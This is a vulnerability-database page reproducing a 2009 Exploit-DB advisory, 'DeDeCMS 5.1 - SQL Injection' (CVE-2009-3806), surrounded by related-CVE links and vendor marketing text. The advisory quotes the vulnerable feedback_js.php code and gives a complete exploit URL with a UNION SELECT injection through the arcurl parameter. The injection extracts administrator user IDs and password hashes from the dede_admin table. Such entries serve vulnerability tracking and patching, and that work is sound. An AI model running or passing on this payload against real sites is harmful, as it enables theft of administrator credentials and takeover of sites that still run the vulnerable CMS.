Lucene search
+L

DeDeCMS 5.1 - SQL Injection

🗓️ 14 Oct 2009 00:00:00Reported by Securitylab Security ResearchType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

DeDeCMS 5.1 SQL Injection discovered by Securitylab.i

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3806
14 Oct 200900:00
circl
cve
CVE
CVE-2009-3806
27 Oct 200916:00
cve
cvelist
Cvelist
CVE-2009-3806
27 Oct 200916:00
cvelist
euvd
EUVD
EUVD-2009-3778
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3806
27 Oct 200916:30
nvd
prion
Prion
Sql injection
27 Oct 200916:30
prion
######################### Securitylab.ir ########################
# Application Info:
# Name: DEDECMS
# Version: 5.1
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
#===========================================================
# feedback_js.php
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
 if(is_array($row)) $urlindex = $row['id'];
}
if(empty($arcID) && empty($urlindex)) exit();
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
else $wq = " aid='$arcID' ";
 $querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Oct 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02638
42